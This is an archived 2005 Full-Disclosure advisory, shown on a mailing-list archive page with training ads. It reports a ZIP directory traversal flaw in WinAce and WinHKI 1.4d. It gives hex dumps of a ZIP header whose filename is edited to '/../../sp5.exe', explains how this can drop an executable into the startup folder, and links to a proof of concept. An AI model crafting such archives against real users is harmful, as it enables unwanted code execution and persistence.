Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] WinAce & WinHKI - ZIP File Directory Transversal

from [Rafel Ivgi, The-Insider] Network Security [Permanent Link]
Subject: [Full-Disclosure] WinAce & WinHKI - ZIP File Directory Transversal
Date: Thu, 06 Jan 2005 10:21:39 +0200 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    WinAce, WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            ZIP File Directory Transversal
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@mail.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ
compressions.
WinAce is a file archiever which supports: CAB, JAR, ZIP, RAR, TAR, GZ,
TAR.GZ, LZA, LHA compressions.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is a normal ZIP compressed file header

00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp
00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0
00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(
00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC  ...@D}:..I@C.|.

in the following code, we can see how easy it is to change the path
to anywhere we want, including the all users start up folder.
I just overwrited the original long file name to /../../sp5.exe

00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb
00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z
00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j
00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}

All we need to do is zip compress (using winzip, winrar, winace)
a file with a long name/path and change the path specified inside the file
to whatever we want Using any Hex editor such as HexWorkshop, just add
anything to the filename.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.web1000.com/WINACE-WINHKI ZIP TRANSVERSAL.zip

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] WinAce & WinHKI - ZIP File Directory Transversal, Rafel Ivgi, The-Insider <=
Previous by Date:  [Full-Disclosure] All Symantec Products All Versions Until 2005 - Remote Stack Buffer Overflow, Rafel Ivgi, The-Insider
Next by Date:  [VulnWatch] WinHKI - LHA File Incorrect Filename Handeling Leads to Crash/Underflow, Rafel Ivgi, The-Insider
Previous by Thread:  [Full-Disclosure] All Symantec Products All Versions Until 2005 - Remote Stack Buffer Overflow, Rafel Ivgi, The-Insider
Next by Thread:  [VulnWatch] WinHKI - LHA File Incorrect Filename Handeling Leads to Crash/Underflow, Rafel Ivgi, The-Insider
Indexes:  [Date] [Thread] [Top] [All Lists]